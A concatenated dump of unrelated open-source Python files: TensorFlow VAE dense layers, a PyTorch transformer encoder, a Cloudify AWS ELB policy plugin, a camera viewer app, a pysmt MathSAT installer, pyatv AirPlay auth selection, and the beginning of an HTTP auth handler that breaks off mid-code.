z_mean, z_log_sigma = tuple(
LayerClass(fan_in=n_hidden[-1], fan_out=n_latent, activation=activation,
dropout=dropout, bias_strategy=bias_strategy,
seed=seed).feed_forward(encode) # operate on encode operation
for _ in ('z_mean', 'z_log_sigma') # just because easier to debug...
)
# kingma & welling: only 1 draw necessary as long as minibatch large enough (>100)
z = self._gaussian_sample(z_mean, z_log_sigma, random_state)
# define decode layers - only to the second to last. The last layer
# should use a sigmoid activation regardless of the defined activation
# (because binary cross entropy). These are the generative layers: p(x|z)
decoding_layers = [
LayerClass(fan_in=fan_in, fan_out=fan_out,
activation=activation, dropout=dropout,
bias_strategy=bias_strategy,
seed=seed)
for fan_in, fan_out in decode_dimensions[:-1]
]
# append the FINAL layer class which uses sigmoid and squashes output to [0, 1]
fi, fo = decode_dimensions[-1] # fee, fi, fo... heh
decoding_layers.append(LayerClass(fan_in=fi, fan_out=fo,
activation=tf.nn.sigmoid, dropout=dropout,
bias_strategy=bias_strategy,
seed=seed))
decode = _chain_layers(decoding_layers, z) # put all layers together
# set some internals...
self.z_mean_, self.z_log_sigma_, self.z_ = z_mean, z_log_sigma, z
return encode, decode, encoding_layers, decoding_layers
class _BaseDenseLayer(six.with_metaclass(ABCMeta, BaseEstimator)):
def __init__(self, fan_in, fan_out, activation, dropout, bias_strategy, seed):
self.fan_in = fan_in
self.fan_out = fan_out
self.activation = activation
self.dropout = dropout
self.seed = seed
# validate strategy
if bias_strategy not in PERMITTED_BIAS_STRATEGIES:
raise ValueError("bias_strategy must be one of %r" % list(PERMITTED_BIAS_STRATEGIES.keys()))
self.bias_strategy = PERMITTED_BIAS_STRATEGIES[bias_strategy]
# initialize
w, self.b_ = self._initialize_weights_biases()
# add the dropout term
self.w_ = tf.nn.dropout(w, self.dropout)
def feed_forward(self, tensor):
return self.activation(tf.add(tf.matmul(tensor, self.w_), self.b_))
@abstractmethod
def _initialize_weights_biases(self):
"""Initialize based on which type"""
class GaussianDenseLayer(_BaseDenseLayer):
"""A fully connected layer of neurons initialized via random normal distributions.
Parameters
----------
fan_in : int
The dimension of the input, i.e., the number of neurons in the input.
fan_out : int
The dimension of the output, i.e., the number of neurons in the output.
activation : callable
The activation function.
dropout : TensorFlow Placeholder
The placeholder for the dropout
bias_strategy : str, optional (default='zeros')
The strategy for initializing the bias vector. Default is 'zeros' and will
initialize all bias values as zeros. The alternative is 'ones', which will
initialize all bias values as ones.
seed : int, optional (default=42)
The seed for random variable generation.
References
----------
[1] Based on code at https://github.com/fastforwardlabs/vae-tf
"""
def __init__(self, fan_in, fan_out, activation, dropout, bias_strategy='zeros', seed=42):
super(GaussianDenseLayer, self).__init__(fan_in=fan_in, fan_out=fan_out, activation=activation,
dropout=dropout, bias_strategy=bias_strategy, seed=seed)
@overrides(_BaseDenseLayer)
def _initialize_weights_biases(self):
"""Initialize weights in a normalized sense (adaptation of Xavier initialization)"""
sd = tf.cast((2 / self.fan_in) ** 0.5, DTYPE)
initial_w = tf.random_normal([self.fan_in, self.fan_out], stddev=sd, seed=self.seed, dtype=DTYPE)
initial_b = self.bias_strategy([self.fan_out], dtype=DTYPE)
return tf.Variable(initial_w, trainable=True), tf.Variable(initial_b, trainable=True)
class XavierDenseLayer(_BaseDenseLayer):
"""A fully connected layer of neurons initialized via Xavier initialization distributions.
Parameters
----------
fan_in : int
The dimension of the input, i.e., the number of neurons in the input.
fan_out : int
The dimension of the output, i.e., the number of neurons in the output.
activation : callable
The activation function.
dropout : TensorFlow Placeholder
The placeholder for the dropout
bias_strategy : str, optional (default='zeros')
The strategy for initializing the bias vector. Default is 'zeros' and will
initialize all bias values as zeros. The alternative is 'ones', which will
initialize all bias values as ones.
seed : int, optional (default=42)
The seed for random variable generation.
References
----------
[1] Based on code at https://github.com/fastforwardlabs/vae-tf
"""
def __init__(self, fan_in, fan_out, activation, dropout, bias_strategy='zeros', seed=42):
super(XavierDenseLayer, self).__init__(fan_in=fan_in, fan_out=fan_out, activation=activation,
dropout=dropout, seed=seed, bias_strategy=bias_strategy)
@overrides(_BaseDenseLayer)
def _initialize_weights_biases(self):
"""Initialize weights via Xavier initialization"""
low = -1. * np.sqrt(6.0 / (self.fan_in + self.fan_out))
high = 1. * np.sqrt(6.0 / (self.fan_in + self.fan_out))
initial_w = tf.random_uniform(shape=[self.fan_in, self.fan_out], minval=low,
maxval=high, dtype=DTYPE, seed=self.seed)
initial_b = self.bias_strategy([self.fan_out], dtype=DTYPE)
return tf.Variable(initial_w, trainable=True), tf.Variable(initial_b, trainable=True)
# these are strategy/type mappings for mapping a str to a callable
PERMITTED_LAYER_TYPES = {
'gaussian': GaussianDenseLayer,
'xavier': XavierDenseLayer,
}
PERMITTED_BIAS_STRATEGIES = {
'ones': tf.ones,
'zeros': tf.zeros
}
|
<gh_stars>1-10
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
class PositionalEncoding(nn.Module):
def __init__(self, max_seq_len, features_dim):
super(PositionalEncoding, self).__init__()
pos_enc = np.array(
[[pos/np.power(10000, 2.0*(i//2)/features_dim) for i in range(features_dim)]
for pos in range(max_seq_len)])
pos_enc[:,0::2] = np.sin(pos_enc[:,0::2])
pos_enc[:,1::2] = np.cos(pos_enc[:,1::2])
self.pos_enc = torch.from_numpy(pos_enc).cuda()
def forward(self, x, seq_len):
# x: [B, T, feat_dim]
for i in range(x.size(0)):
len_ = seq_len[i]
x[i,:len_,:] += self.pos_enc[:len_, :]
return x
class LayerNorm(nn.Module):
def __init__(self, d_hid, eps=1e-6):
super(LayerNorm, self).__init__()
# d_hid = feat_dim
self.gamma = nn.Parameter(torch.ones(d_hid))
self.beta = nn.Parameter(torch.zeros(d_hid))
self.eps = eps
def forward(self, x):
mean = x.mean(dim=-1, keepdim=True,)
std = x.std(dim=-1, keepdim=True,)
ln_out = (x - mean) / (std + self.eps)
ln_out = self.gamma * ln_out + self.beta
return ln_out
class ScaledDotProductAttention(nn.Module):
def __init__(self,d_k, dropout=0.1):
super(ScaledDotProductAttention, self).__init__()
self.scale_factor = np.sqrt(d_k)
self.softmax = nn.Softmax(dim=-1)
self.dropout = nn.Dropout(dropout)
def forward(self, q, k, v, atten_mask=None):
# queries: [B, n_head, len_queries, d_k]
# keys: [B, n_head, len_keys, d_k]
# values: [B, n_head, len_values, d_v] note: len_keys = len_values
scores = torch.matmul(q, k.transpose(-1, -2))/ self.scale_factor
if atten_mask is not None:
assert atten_mask.size() == scores.size()
scores.masked_fill_(atten_mask, -1e9)
atten = self.dropout(self.softmax(scores))
context = torch.matmul(atten, v)
return context, atten
class Linear(nn.Module):
def __init__(self, in_features, out_features, bias=True):
super(Linear, self).__init__()
self.linear = nn.Linear(in_features, out_features, bias=bias)
init.xavier_normal_(self.linear.weight) #For Sigmoid
# init.kaiming_normal_(self.linear.weight) #for ReLU
init.zeros_(self.linear.bias)
def forward(self, inputs):
return self.linear(inputs)
class MultiHeadAttention(nn.Module):
def __init__(self, feat_dim, d_k, d_v, n_heads, dropout):
super(MultiHeadAttention, self).__init__()
self.d_k = d_k
self.d_v = d_v
self.feat_dim = feat_dim
self.n_heads = n_heads
self.w_q = Linear(feat_dim, d_k*n_heads)
self.w_k = Linear(feat_dim, d_k*n_heads)
self.w_v = Linear(feat_dim, d_v*n_heads)
self.attenion = ScaledDotProductAttention(d_k=d_k, dropout=dropout)
def forward(self, x, atten_mask):
batch_size = x.size(0)
q_ = self.w_q(x).view(batch_size, -1,self.n_heads, self.d_k).transpose(1,2)
k_ = self.w_k(x).view(batch_size, -1,self.n_heads, self.d_k).transpose(1,2)
v_ = self.w_v(x).view(batch_size, -1, self.n_heads, self.d_v).transpose(1, 2)
# q_: [Batch, n_heads, len, d_k]
# k_: [Batch, n_heads, len, d_k]
# v_: [Batch, n_heads, len, d_v]
if atten_mask is not None:
# [Batch, len, len] -> [Batch, n_heads, len, len]
atten_mask = atten_mask.unsqueeze(1).repeat(1, self.n_heads, 1, 1)
context, atten = self.attenion(q_, k_, v_, atten_mask)
context = context.transpose(1,2).contiguous().view(batch_size, -1, self.n_heads*self.d_v)
return context, atten
class MultiHeadAttentionLayer(nn.Module):
def __init__(self, feat_dim, d_k, d_v, n_heads, dropout):
super(MultiHeadAttentionLayer, self).__init__()
self.n_heads = n_heads
self.multihead_attention = MultiHeadAttention(feat_dim, d_k, d_v, n_heads, dropout)
self.linear = Linear(n_heads*d_v, feat_dim)
self.dropout = nn.Dropout(dropout)
self.layernorm = LayerNorm(feat_dim)
def forward(self, x, atten_mask):
# x_: [Batch, n_heads, len, feat_dim]
residual = x
# x = self.layernorm(x) # pre-LN
context, atten = self.multihead_attention(x, atten_mask)
output = self.dropout(self.linear(context))
output = self.layernorm(output + residual) # post-LN
# output = output+residual # pre-LN
# output: [Batch, len, feat_dim]
return output, atten
class PositionWiseFeedForward(nn.Module):
def __init__(self, feat_dim, d_ff=2048, dropout=0.1):
super(PositionWiseFeedForward, self).__init__()
self.relu = nn.ReLU()
self.fc1 = Linear(feat_dim, d_ff)
self.fc2 = Linear(d_ff, feat_dim)
self.dropout = nn.Dropout(dropout)
self.layernorm = LayerNorm(feat_dim)
def forward(self, x):
residual = x
# x = self.layernorm(x) #pre-LN
output = self.relu(self.fc1(x))
output = self.dropout(self.fc2(output))
output = self.layernorm(output+residual) #post-LN
# output = output+residual #pre-LN
return output
class EncoderBlock(nn.Module):
def __init__(self, feat_dim, d_k, d_v, d_ff, n_heads, dropout=0.1):
super(EncoderBlock, self).__init__()
self.self_attention = MultiHeadAttentionLayer(feat_dim, d_k, d_v, n_heads, dropout)
self.position_wise_ff = PositionWiseFeedForward(feat_dim, d_ff, dropout)
def forward(self, x, atten_mask):
enc_output, atten = self.self_attention(x, atten_mask)
enc_output = self.position_wise_ff(enc_output)
return enc_output, atten
|
<reponame>szpotona/cloudify-aws-plugin<gh_stars>0
# Copyright (c) 2018 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
ELB.classic.policy
~~~~~~~~~~~~
AWS ELB classic policy interface
"""
# Third party imports
from botocore.exceptions import ClientError
from cloudify.exceptions import OperationRetry
# Local imports
from cloudify_aws.elb import ELBBase
from cloudify_aws.common._compat import text_type
from cloudify_aws.common import decorators, utils
from cloudify_aws.common.connection import Boto3Connection
from cloudify_aws.common.constants import EXTERNAL_RESOURCE_ID
RESOURCE_TYPE = 'ELB classic policy'
RESOURCE_NAME = 'PolicyName'
RESOURCE_NAMES = 'PolicyNames'
LB_NAME = 'LoadBalancerName'
LB_PORT = 'LoadBalancerPort'
LB_TYPE = 'cloudify.nodes.aws.elb.Classic.LoadBalancer'
LISTENER_TYPE = 'cloudify.nodes.aws.elb.Classic.Listener'
class ELBClassicPolicy(ELBBase):
"""
AWS ELB classic policy interface
"""
def __init__(self, ctx_node, resource_id=None, client=None, logger=None):
ELBBase.__init__(
self,
ctx_node,
resource_id,
client or Boto3Connection(ctx_node).client('elb'),
logger)
self.type_name = RESOURCE_TYPE
@property
def properties(self):
"""Gets the properties of an external resource"""
return None
@property
def status(self):
"""Gets the status of an external resource"""
return None
def create(self, params):
"""
Create a new AWS ELB classic policy.
.. note:
See http://bit.ly/2oYIQrZ for config details.
"""
return self.make_client_call('create_load_balancer_policy', params)
def create_sticky(self, params):
"""
Create a new AWS ELB classic policy.
.. note:
See http://bit.ly/2oYIQrZ for config details.
"""
self.logger.debug('Creating %s with parameters: %s'
% (self.type_name, params))
res = \
self.client.create_lb_cookie_stickiness_policy(**params)
self.logger.debug('Response: %s' % res)
return res
def start(self, params):
"""
Refresh the AWS ELB classic policies.
.. note:
See http://bit.ly/2qBuhb5 for config details.
"""
self.logger.debug('Creating %s with parameters: %s'
% (self.type_name, params))
res = self.client.set_load_balancer_policies_of_listener(**params)
self.logger.debug('Response: %s' % res)
return res
def delete(self, params=None):
"""
Deletes an existing ELB classic policy.
.. note:
See http://bit.ly/2qGiN5e for config details.
"""
self.logger.debug('Deleting %s with parameters: %s'
% (self.type_name, params))
return self.client.delete_load_balancer_policy(**params)
@decorators.aws_resource(ELBClassicPolicy, RESOURCE_TYPE)
def prepare(ctx, resource_config, **_):
"""Prepares an ELB classic policy"""
# Save the parameters
ctx.instance.runtime_properties['resource_config'] = resource_config
@decorators.aws_resource(ELBClassicPolicy, RESOURCE_TYPE)
@decorators.aws_params(RESOURCE_NAME, params_priority=False)
def create(ctx, iface, resource_config, params, **_):
"""Creates an AWS ELB classic policy"""
lb_name = params.get(LB_NAME)
if not lb_name:
targs = \
utils.find_rels_by_node_type(
ctx.instance,
LB_TYPE)
lb_name = \
targs[0].target.instance.runtime_properties[
EXTERNAL_RESOURCE_ID]
params.update({LB_NAME: lb_name})
ctx.instance.runtime_properties[LB_NAME] = \
lb_name
# Actually create the resource
iface.create(params)
@decorators.aws_resource(ELBClassicPolicy, RESOURCE_TYPE)
def create_sticky(ctx, iface, resource_config, **_):
"""Creates an AWS ELB classic policy"""
# Create a copy of the resource config for clean manipulation.
params = \
dict() if not resource_config else resource_config.copy()
lb_name = params.get(LB_NAME)
policy_name = params.get(RESOURCE_NAME)
if not lb_name:
targs = \
utils.find_rels_by_node_type(
ctx.instance,
LB_TYPE)
lb_name = \
targs[0].target.instance.runtime_properties[
EXTERNAL_RESOURCE_ID]
params.update({LB_NAME: lb_name})
ctx.instance.runtime_properties[LB_NAME] = \
lb_name
ctx.instance.runtime_properties[RESOURCE_NAME] = \
policy_name
# Actually create the resource
iface.create_sticky(params)
@decorators.aws_resource(ELBClassicPolicy,
RESOURCE_TYPE,
ignore_properties=True)
def start_sticky(ctx, iface, resource_config, **_):
"""Starts an AWS ELB classic policy"""
# Create a copy of the resource config for clean manipulation.
params = \
dict() if not resource_config else resource_config.copy()
lb_name = params.get(LB_NAME)
lb_port = params.get(LB_PORT)
policy_names = params.get(RESOURCE_NAMES)
# This operations requires the LoadBalancerName, LoadBalancerPort,
# and the PolicyName.
if not lb_name:
targs = \
utils.find_rels_by_node_type(
ctx.instance,
LB_TYPE)
lb_name = \
targs[0].target.instance.runtime_properties[
EXTERNAL_RESOURCE_ID]
ctx.instance.runtime_properties[LB_NAME] = \
lb_name
params.update({LB_NAME: lb_name})
# The LoadBalancerPort can come either from the resource config,
# or it can come from a relationship to a Listener or a LoadBalancer.
# A listener is prefered because only one LoadBalancerPort is expected
# to be defined per listener, whereas a LoadBalancer many listeners
# are defined. If many listeners are found then the first listener is
# used.
if not lb_port:
targs = \
utils.find_rels_by_node_type(
ctx.instance,
LISTENER_TYPE)
if not targs:
targs = \
utils.find_rels_by_node_type(
ctx.instance,
LB_TYPE)
instance_cfg = \
targs[0].target.instance.runtime_properties['resource_config']
else:
instance_cfg = \
targs[0].target.instance.runtime_properties['resource_config']
listener = instance_cfg.get('Listeners', [{}])[0]
lb_port = listener.get(LB_PORT)
params.update({LB_PORT: lb_port})
# This API call takes a list of policies as an argument.
# However this node type represents only one policy.
# Therefore we restrict the usage.
if not policy_names:
policy_names = ctx.instance.runtime_properties[RESOURCE_NAME]
params.update({RESOURCE_NAMES: [policy_names]})
# Actually create the resource
iface.start(params)
@decorators.aws_resource(ELBClassicPolicy, RESOURCE_TYPE)
def delete(ctx, iface, resource_config, **_):
"""Deletes an AWS ELB classic policy"""
# Create a copy of the resource config for clean manipulation.
params = \
dict() if not resource_config else resource_config.copy()
lb = params.get(LB_NAME) or ctx.instance.runtime_properties.get(LB_NAME)
policy = \
params.get(RESOURCE_NAME) or \
ctx.instance.runtime_properties.get(RESOURCE_NAME)
lb_delete_params = {
LB_NAME: lb,
RESOURCE_NAME: policy
}
try:
iface.delete(lb_delete_params)
except ClientError as e:
if _.get('force'):
raise OperationRetry('Retrying: {0}'.format(text_type(e)))
pass
|
import argparse
from director import consoleapp
from director import cameraview
from director import applogic
from director import viewbehaviors
from director import objectmodel as om
from director import vtkAll as vtk
import PythonQt
from PythonQt import QtGui
class ImageViewApp(object):
def __init__(self):
self.setup()
def addShortcuts(self, widget):
applogic.addShortcut(widget, "Ctrl+Q", consoleapp.ConsoleApp.quit)
applogic.addShortcut(widget, "F8", consoleapp.ConsoleApp.showPythonConsole)
def parseArgs(self, defaultChannel="MULTISENSE_CAMERA_LEFT"):
parser = argparse.ArgumentParser()
parser.add_argument(
"--channel", type=str, help="image channel", default=defaultChannel
)
parser.add_argument(
"--pointcloud",
action="store_true",
help="display pointcloud view for RGB-D messages",
)
parser.add_argument(
"--disparity",
action="store_true",
help="receive disparity images for --rgbd flag",
)
imageType = parser.add_mutually_exclusive_group(required=False)
imageType.add_argument(
"--rgb",
action="store_const",
const="rgb",
help="receive RGB image messages",
dest="imageType",
)
imageType.add_argument(
"--rgbd",
action="store_const",
const="rgbd",
help="receive RGB-D images messages",
dest="imageType",
)
imageType.set_defaults(imageType="rgb")
args, unknown = parser.parse_known_args()
return args
def setup(self):
args = self.parseArgs()
imageManager = cameraview.ImageManager()
self.imageManager = imageManager
channel = args.channel
imageType = args.imageType
self.app = consoleapp.ConsoleApp()
self.views = []
if imageType == "rgb":
imageName = channel
imageManager.queue.addCameraStream(channel, imageName, -1)
imageManager.addImage(imageName)
cameraView = cameraview.CameraImageView(
imageManager, imageName, view=PythonQt.dd.ddQVTKWidgetView()
)
cameraView.eventFilterEnabled = False
cameraView.view.renderWindow().GetInteractor().SetInteractorStyle(
vtk.vtkInteractorStyleImage()
)
cameraView.view.resize(640, 480)
self.views.append(cameraView.view)
self.cameraView = cameraView
elif imageType == "rgbd":
imageName = channel + "_LEFT"
imageManager.queue.addCameraStream(channel, imageName, 0)
imageManager.addImage(imageName)
cameraView = cameraview.CameraImageView(
imageManager, imageName, view=PythonQt.dd.ddQVTKWidgetView()
)
cameraView.eventFilterEnabled = False
cameraView.view.renderWindow().GetInteractor().SetInteractorStyle(
vtk.vtkInteractorStyleImage()
)
self.views.append(cameraView.view)
imageName2 = channel + "_D"
# if args.disparity:
# imageManager.queue.addCameraStream(channel, imageName2, lcmbotcore.images_t.DISPARITY_ZIPPED)
# else:
# imageManager.queue.addCameraStream(channel, imageName2, lcmbotcore.images_t.DEPTH_MM_ZIPPED)
imageManager.addImage(imageName2)
cameraView2 = cameraview.CameraImageView(
imageManager, imageName2, view=PythonQt.dd.ddQVTKWidgetView()
)
cameraView2.eventFilterEnabled = False
cameraView2.useImageColorMap = True
cameraView2.view.renderWindow().GetInteractor().SetInteractorStyle(
vtk.vtkInteractorStyleImage()
)
self.views.append(cameraView2.view)
if args.pointcloud:
from director import segmentation
cameraview.imageManager = imageManager
pointCloudObj = segmentation.DisparityPointCloudItem(
"Point cloud", channel, imageName, imageManager
)
view = PythonQt.dd.ddQVTKWidgetView()
pointCloudObj.addToView(view)
om.addToObjectModel(pointCloudObj)
pointCloudObj.setProperty("Visible", True)
pointCloudObj.setProperty("Target FPS", 30)
pointCloudObj.setProperty("Max Range", 30)
pointCloudObj.setProperty("Remove Size", 0)
viewBehaviors = viewbehaviors.ViewBehaviors(view)
view.camera().SetPosition([0, 0, 0])
view.camera().SetFocalPoint([0, 0, 1])
view.camera().SetViewUp([0, -1, 0])
view.camera().SetViewAngle(45)
self.views.append(view)
self.cameraView = cameraView
self.cameraView2 = cameraView2
w = QtGui.QWidget()
l = QtGui.QHBoxLayout(w)
for view in self.views:
l.addWidget(view)
l.setContentsMargins(0, 0, 0, 0)
w.resize(640 * len(self.views), 480)
w.show()
self.addShortcuts(w)
self.widget = w
def start(self):
self.app.start()
def main():
ImageViewApp().start()
if __name__ == "__main__":
main()
|
# Copyright 2014 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import glob
from pysmt.cmd.installers.base import SolverInstaller
class MSatInstaller(SolverInstaller):
SOLVER = "msat"
def __init__(self, install_dir, bindings_dir, solver_version,
mirror_link=None):
# Getting the right archive name
os_name = self.os_name
arch = self.architecture
ext = "tar.gz"
if os_name == "windows":
ext = "zip"
arch = "msvc"
if self.architecture == "x86_64":
os_name = "win64"
else:
os_name = "win32"
elif os_name == "darwin":
os_name = "darwin-libcxx"
archive_name = "mathsat-%s-%s-%s.%s" % (solver_version, os_name,
arch, ext)
native_link = "http://mathsat.fbk.eu/download.php?file={archive_name}"
SolverInstaller.__init__(self, install_dir=install_dir,
bindings_dir=bindings_dir,
solver_version=solver_version,
archive_name=archive_name,
native_link = native_link,
mirror_link=mirror_link)
self.python_bindings_dir = os.path.join(self.extract_path, "python")
def compile(self):
if self.os_name == "windows":
libdir = os.path.join(self.python_bindings_dir, "../lib")
incdir = os.path.join(self.python_bindings_dir, "../include")
gmp_h_url = "https://github.com/mikand/tamer-windows-deps/raw/master/gmp/include/gmp.h"
mpir_dll_url = "https://github.com/Legrandin/mpir-windows-builds/blob/master/mpir-2.6.0_VS2015_%s/mpir.dll?raw=true" % self.bits
mpir_lib_url = "https://github.com/Legrandin/mpir-windows-builds/blob/master/mpir-2.6.0_VS2015_%s/mpir.lib?raw=true" % self.bits
setup_py_win_url = "https://github.com/pysmt/solvers_patches/raw/master/mathsat/setup-win.py"
SolverInstaller.do_download(gmp_h_url, os.path.join(incdir, "gmp.h"))
SolverInstaller.do_download(mpir_dll_url, os.path.join(libdir, "mpir.dll"))
SolverInstaller.do_download(mpir_lib_url, os.path.join(libdir, "mpir.lib"))
# Overwrite setup.py with the patched version
setup_py = os.path.join(self.python_bindings_dir, "setup.py")
SolverInstaller.mv(setup_py, setup_py + ".original")
SolverInstaller.do_download(setup_py_win_url, setup_py)
# Run setup.py to compile the bindings
if self.os_name == "windows":
SolverInstaller.run_python("./setup.py build_ext", self.python_bindings_dir)
else:
# NB: -R adds --rpath=$ORIGIN to link step, which makes shared library object
# searched for in the extension's directory (no need for LD_LIBRARY_PATH)
# (note: this is the default behavior for DLL discovery on Windows)
SolverInstaller.run_python("./setup.py build_ext -R $ORIGIN", self.python_bindings_dir)
def move(self):
pdir = self.python_bindings_dir
bdir = os.path.join(pdir, "build")
sodir = glob.glob(bdir + "/lib.*")[0]
libdir = os.path.join(self.python_bindings_dir, "../lib")
# First, we need the SWIG-generated wrapper
for f in os.listdir(sodir):
if f.endswith(".so") or f.endswith(".pyd"):
SolverInstaller.mv(os.path.join(sodir, f), self.bindings_dir)
SolverInstaller.mv(os.path.join(pdir, "mathsat.py"), self.bindings_dir)
# Since MathSAT 5.5.0 we also need the SO/DLL/DYLIB of mathsat in the PATH
# Under Windows, we also need the DLLs of MPIR in the PATH
for f in os.listdir(libdir):
if f.endswith(".so") or f.endswith(".dll") or f.endswith(".dylib"):
SolverInstaller.mv(os.path.join(libdir, f), self.bindings_dir)
# Fix issue in MathSAT 5.5.1 linking to incorrect directory on OSX
if self.os_name == "darwin":
soname = glob.glob(self.bindings_dir + "/_mathsat*.so")[0]
old_path = "/Users/griggio/Documents/src/mathsat_release/build/libmathsat.dylib"
new_path = "%s/libmathsat.dylib" % self.bindings_dir
SolverInstaller.run("install_name_tool -change %s %s %s" %
(old_path, new_path, soname))
def get_installed_version(self):
return self.get_installed_version_script(self.bindings_dir, "msat")
|
<filename>pyatv/protocols/airplay/auth/__init__.py<gh_stars>100-1000
"""Pick authentication type based on device support."""
import logging
from typing import Tuple
from pyatv import exceptions
from pyatv.auth.hap_pairing import (
NO_CREDENTIALS,
TRANSIENT_CREDENTIALS,
AuthenticationType,
HapCredentials,
PairSetupProcedure,
PairVerifyProcedure,
parse_credentials,
)
from pyatv.auth.hap_session import HAPSession
from pyatv.auth.hap_srp import SRPAuthHandler
from pyatv.interface import BaseService
from pyatv.protocols.airplay.auth.hap import (
AirPlayHapPairSetupProcedure,
AirPlayHapPairVerifyProcedure,
)
from pyatv.protocols.airplay.auth.hap_transient import (
AirPlayHapTransientPairVerifyProcedure,
)
from pyatv.protocols.airplay.auth.legacy import (
AirPlayLegacyPairSetupProcedure,
AirPlayLegacyPairVerifyProcedure,
)
from pyatv.protocols.airplay.srp import LegacySRPAuthHandler, new_credentials
from pyatv.protocols.airplay.utils import AirPlayFlags, parse_features
from pyatv.support.http import HttpConnection
_LOGGER = logging.getLogger(__name__)
CONTROL_SALT = "Control-Salt"
CONTROL_OUTPUT_INFO = "Control-Write-Encryption-Key"
CONTROL_INPUT_INFO = "Control-Read-Encryption-Key"
class NullPairVerifyProcedure:
"""Null implementation for Pair-Verify when no verification is needed."""
async def verify_credentials(self) -> bool:
"""Verify if credentials are valid."""
_LOGGER.debug("Performing null Pair-Verify")
return False
@staticmethod
def encryption_keys(salt: str, output_info: str, input_key: str) -> Tuple[str, str]:
"""Return derived encryption keys."""
raise exceptions.NotSupportedError(
"encryption keys not supported by null implementation"
)
def pair_setup(
auth_type: AuthenticationType, connection: HttpConnection
) -> PairSetupProcedure:
"""Return procedure object used for Pair-Setup."""
_LOGGER.debug("Setting up new AirPlay Pair-Setup procedure with type %s", auth_type)
if auth_type == AuthenticationType.Legacy:
srp = LegacySRPAuthHandler(new_credentials())
srp.initialize()
return AirPlayLegacyPairSetupProcedure(connection, srp)
if auth_type == AuthenticationType.HAP:
srp = SRPAuthHandler()
srp.initialize()
return AirPlayHapPairSetupProcedure(connection, srp)
raise exceptions.NotSupportedError(
f"authentication type {auth_type} does not support Pair-Setup"
)
def pair_verify(
credentials: HapCredentials, connection: HttpConnection
) -> PairVerifyProcedure:
"""Return procedure object used for Pair-Verify."""
_LOGGER.debug(
"Setting up new AirPlay Pair-Verify procedure with type %s", credentials.type
)
if credentials.type == AuthenticationType.Null:
return NullPairVerifyProcedure()
if credentials.type == AuthenticationType.Legacy:
srp = LegacySRPAuthHandler(credentials)
srp.initialize()
return AirPlayLegacyPairVerifyProcedure(connection, srp)
srp = SRPAuthHandler()
srp.initialize()
if credentials.type == AuthenticationType.HAP:
return AirPlayHapPairVerifyProcedure(connection, srp, credentials)
return AirPlayHapTransientPairVerifyProcedure(connection, srp)
async def verify_connection(
credentials: HapCredentials, connection: HttpConnection
) -> None:
"""Perform Pair-Verify on a connection and enable encryption."""
verifier = pair_verify(credentials, connection)
has_encryption_keys = await verifier.verify_credentials()
if has_encryption_keys:
output_key, input_key = verifier.encryption_keys(
CONTROL_SALT, CONTROL_OUTPUT_INFO, CONTROL_INPUT_INFO
)
session = HAPSession()
session.enable(output_key, input_key)
connection.receive_processor = session.decrypt
connection.send_processor = session.encrypt
return verifier
def extract_credentials(service: BaseService) -> HapCredentials:
"""Extract credentials from service based on what's supported."""
if service.credentials is not None:
return parse_credentials(service.credentials)
flags = parse_features(service.properties.get("features", "0x0"))
if (
AirPlayFlags.SupportsSystemPairing in flags
or AirPlayFlags.SupportsCoreUtilsPairingAndEncryption in flags
):
return TRANSIENT_CREDENTIALS
return NO_CREDENTIALS
|
# TODO check if jwt is used and all modules are present
from ..._py2 import *
from future.utils import with_metaclass
import logging
import re
from datetime import datetime
from collections import OrderedDict
import hashlib
# optional features
try:
from passlib import hash as unix_hash
except ImportError:
pass
from ... import endpoints
from ...utils import is_str, is_seq_like, is_map_like, \
datetime_to_timestamp, curr_timestamp, open_path
from ..base import BaseMeta, BaseHTTPRequestHandler
from .utils import num_charsets
from .exc import UserAlreadyExistsError, NoSuchUserError, \
InvalidUsernameError, BadPasswordError
logger = logging.getLogger(__name__)
class ReadOnlyDict(object):
def __contains__(self, key):
return self._dict_data.__contains__(key)
def __getitem__(self, key):
return self._dict_data.__getitem__(key)
def __iter__(self):
return self._dict_data.__iter__()
def __len__(self):
return self._dict_data.__len__()
def __str__(self):
return self._dict_data.__str__()
def __repr__(self):
return self._dict_data.__repr__()
def get(self, key, default=None):
return self._dict_data.get(key, default)
def items(self):
return self._dict_data.items()
def keys(self):
return self._dict_data.keys()
def values(self):
return self._dict_data.values()
@property
def _dict_data(self):
res = {}
# for a in dir(self):
for a, v in self.__dict__.items():
if a.startswith('_'):
continue
# v = getattr(self, a)
if callable(v):
continue
res[a] = v
return res
class User(ReadOnlyDict):
'''Abstract class for a user'''
def __init__(self,
username=None,
password=<PASSWORD>,
roles=None):
'''
- roles should be a list of Roles or a list of strings
'''
_roles = []
if roles is not None:
for r in roles:
if is_str(r):
_roles.append(Role(r))
else:
_roles.append(r)
self.username = username
self.password = password
self.roles = _roles
class Role(ReadOnlyDict):
'''Abstract class for a user role'''
def __init__(self, name=None):
self.name = name
class Session(ReadOnlyDict):
'''Abstract class for a session'''
def __init__(self,
user=None,
token=None,
expiry=None):
'''
- user should be an instance of User
- expiry should be one of:
1) an int or float as UTC seconds since Unix epoch
2) datetime object
'''
self.user = user
self.token = token
self.expiry = expiry
def has_expired(self):
expiry = self.expiry
if expiry is None:
return False
if isinstance(expiry, datetime):
expiry = datetime_to_timestamp(
expiry, to_utc=True)
return expiry <= curr_timestamp(to_utc=True)
class BaseAuthHTTPRequestHandlerMeta(BaseMeta):
'''Metaclass for BaseAuthHTTPRequestHandler
Check the validity of class attributes and ensures the required
password hashing modules are present.
'''
def __new__(cls, name, bases, attrs):
attrs['_supported_hashes'] = []
new_class = super().__new__(cls, name, bases, attrs)
pwd_types = [None]
prefT = '_transform_password_'
prefV = '_verify_password_'
for m in dir(new_class):
